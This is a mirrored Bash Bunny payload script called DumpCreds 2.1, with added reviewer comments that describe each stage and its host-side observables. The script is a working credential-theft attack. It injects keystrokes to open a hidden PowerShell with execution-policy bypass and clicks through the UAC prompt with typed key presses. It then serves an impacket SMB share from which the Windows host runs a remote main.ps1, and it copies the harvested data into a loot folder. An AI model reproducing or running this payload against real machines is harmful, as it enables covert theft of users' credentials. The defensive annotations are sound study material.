mirror of
https://github.com/hak5darren/bashbunny-payloads.git
synced 2025-10-29 16:58:12 +00:00
#!/bin/bash
#
# Title: DumpCreds 2.1
# Author: QDBA
# Version: 2.1.0
# Build: 1004
# Category: Exfiltration
# Target: Windows Windows 10 (Powershell)
# Attackmodes: HID, Ethernet
# !!! works only with Bash Bunny FW 1.1 and up !!!
#
#
# LED Status
# ----------------------- + --------------------------------------------
# SETUP + Setup
# FAIL + No /tools/impacket/examples/smbserver.py found
# FAIL2 + Target did not acquire IP address
# Yellow single blink + Initialization
# Yellow double blink + HID Stage
# Yellow triple blink + Wait for IP coming up
# Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
# Cyan inv quint blink + Powershell scripts running
# White fast blink + Cleanup, copy Files to <root>/loot
# Green + Finished
# ----------------------- + --------------------------------------------
#
# Reviewer overview (defensive reading of this payload):
#   This script runs on the Bash Bunny itself, not on the target. LED, Q, RUN,
#   ATTACKMODE, GET and REQUIRETOOL are Bash Bunny firmware helpers that are not
#   defined in this file; SWITCH_POSITION and TARGET_IP are expected from that
#   environment. Stages visible below: (1) HID keystroke injection that opens a
#   cmd window and an elevated PowerShell on the host, (2) switch to RNDIS
#   Ethernet, (3) an impacket SMB share "e" backed by the payload directory from
#   which the host-side main.ps1 (not on this page) is executed, (4) a file-based
#   handshake (CON_REQ / CON_OK / CON_EOF) and copy of the results into
#   /root/udisk/loot. Host-side observables a defender can look for are noted
#   at each stage.

logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################"

###### Let's Start ####
LED SETUP

# Some Variables
# SWITCH_POSITION comes from the Bunny firmware environment; loot is collected
# under the payload directory first and moved to /root/udisk/loot at the end.
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
LOOTDIR=$SWITCHDIR/loot

# if the file DEBUG in payload folder exist, enter debug mode
# Debug mode keeps the target-side windows visible and records the Bunny's own
# syslog in the background; the tail is stopped and the log copied to loot at
# the end of the script.
if [ -f $SWITCHDIR/DEBUG ];then
DEBUG=1 # 1= Debug on / 0= Debug off
tail -f /var/log/syslog > /tmp/log.txt &
else
DEBUG=0
fi

mkdir -p $LOOTDIR

# Firmware helper (not on this page); presumably signals LED FAIL from the
# header table when /tools/impacket/examples/smbserver.py is missing.
REQUIRETOOL impacket

# remove old Handshake Files
rm -f $SWITCHDIR/CON_*

# HID STAGE
# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
# Host-side observables for this stage: a newly attached USB keyboard (HID)
# device, a cmd.exe window, a PowerShell started with -NoP -NonI -W Hidden
# -Exec Bypass, and a UAC prompt for an elevated cmd. USB device control /
# allow-listing of HID devices is the control that stops this stage.
logger -t DumpCred_2.1 "### Enter HID Stage ###"
LED STAGE1
ATTACKMODE HID

Q DELAY 5000

# Launch initial cmd
# Non-debug: the console is shrunk to a single line so the window is barely visible.
if [ $DEBUG -eq 1 ]; then
RUN WIN cmd
else
RUN WIN cmd /k mode con lines=1 cols=100
fi

# Launch powershell as admin (red window)
# Start-Process -Verb runAs raises the UAC consent (or credential) prompt;
# /t:4f only sets the colours of the elevated cmd window ("red window" above).
Q DELAY 1000
if [ $DEBUG -eq 1 ]; then
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs"
else
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs"
fi
Q DELAY 500
Q ENTER

# Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o (OK) and ALT c (cancel)

# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD window opens. The ALT n goes to this Window (doesn't matter) then Enter for Newline
# now the second powershell command goes to the admin cmd window.

# With no admin rights the credentials prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials prompt.
# the second powershell command goes to the cmd Window I opened first.
Q DELAY 1000
Q ALT j
Q DELAY 500
Q ENTER

Q DELAY 1000
Q ALT n
Q DELAY 500
Q ENTER

LED STAGE2
# Wait for Bunny Ethernet and Start main.ps1 Powershell Script
# Typed into whichever cmd window has focus (see the note above): a PowerShell
# loop that polls 172.16.64.1 with Test-Connection until it answers, then runs
# \\172.16.64.1\e\main.ps1 from the Bunny's SMB share (debug: visible window,
# output kept in %TEMP%\pslog.tmp; non-debug: hidden window, then exit).
# Host-side observables: ICMP and SMB traffic to 172.16.64.1 over a freshly
# added network adapter, and PowerShell executing a script from a UNC path with
# -ExecutionPolicy Bypass. Script block logging and restricting script
# execution from UNC paths make this stage visible or stop it.
Q DELAY 500
if [ $DEBUG -eq 1 ]; then
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1 9> 1> %TEMP%\pslog.tmp } }\""
else
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\""
fi
Q DELAY 1000
Q ENTER

logger -t DumpCred_2.1 "### Enter Ethernet Stage ###"
# Ethernet Stage
# The Bunny now appears to the host as a second USB function (RNDIS network
# adapter); the host's loop above will start reaching 172.16.64.1 from here on.
LED STAGE3
ATTACKMODE RNDIS_ETHERNET
# Source bunny_helpers.sh to get environment variables
# NOTE(review): no source command follows this comment; the helpers appear to be
# in scope already (LED etc. are used above) — presumably loaded by the firmware.

logger -t DumpCred_2.1 "### Start SMBServer ###"
# Start SMB Server
# impacket smbserver.py serving $SWITCHDIR as share "e": the host reads main.ps1
# from it and, presumably via main.ps1, writes the CON_* handshake files and the
# loot into the same directory. Runs in the background and is not explicitly
# stopped anywhere in this script.
/tools/impacket/examples/smbserver.py e $SWITCHDIR &

# Give target a chance to start exfiltration
sleep 2

GET TARGET_IP
# Check target IP address. If unset, blink slow red.
if [ -z "${TARGET_IP}" ]; then
LED FAIL2
logger -t DumpCred_2.1 "### No Target_IP ###"
logger -t DumpCred_2.1 "### Failed ###"
exit
fi
logger -t DumpCred_2.1 "### TARGET_IP: " $TARGET_IP " ###"

LED STAGE4
# Handshake Bunny and Computer
# Polls for CON_REQ (expected to be created by the host over the share) and
# renames it to CON_OK as the acknowledgement. There is no timeout: if the host
# never connects, this loop runs until the Bunny is unplugged.
while ! [ -f $SWITCHDIR/CON_REQ ]; do
logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_REQ ###"
sleep 1
done
mv $SWITCHDIR/CON_REQ $SWITCHDIR/CON_OK

LED Y VERYFAST
# Wait until CON_EOF - Computer set it if all is ready
# Same pattern as above, again without a timeout.
while ! [ -f $SWITCHDIR/CON_EOF ]; do
logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_EOF ###"
sleep 2
done

LED CLEANUP
# Cleanup
# Moves everything the host dropped into $LOOTDIR to the Bunny's loot folder;
# the payload-side loot directory and the CON_EOF marker are removed so the
# next run starts from a clean state.
logger -t DumpCred_2.1 "### cleanup and copy files ###"
if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then
mkdir -p /root/udisk/loot/DumpCred_2.1
fi
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
rmdir $LOOTDIR
rm -f $SWITCHDIR/CON_EOF

logger -t DumpCred_2.1 "######################## End payload DumpCred_2.1 ##########################"

# really the end....
# Debug: stop the syslog capture started at the top and keep the log with the loot.
if [ $DEBUG -eq 1 ]; then
killall tail
cp /tmp/log.txt /root/udisk/loot/DumpCred_2.1/
fi

# Presumably re-exposes the USB disk so the loot folder is readable from a
# computer; sync twice before the LED signals completion.
ATTACKMODE RNDIS_ETHERNET STORAGE
sync; sleep 1; sync
LED FINISH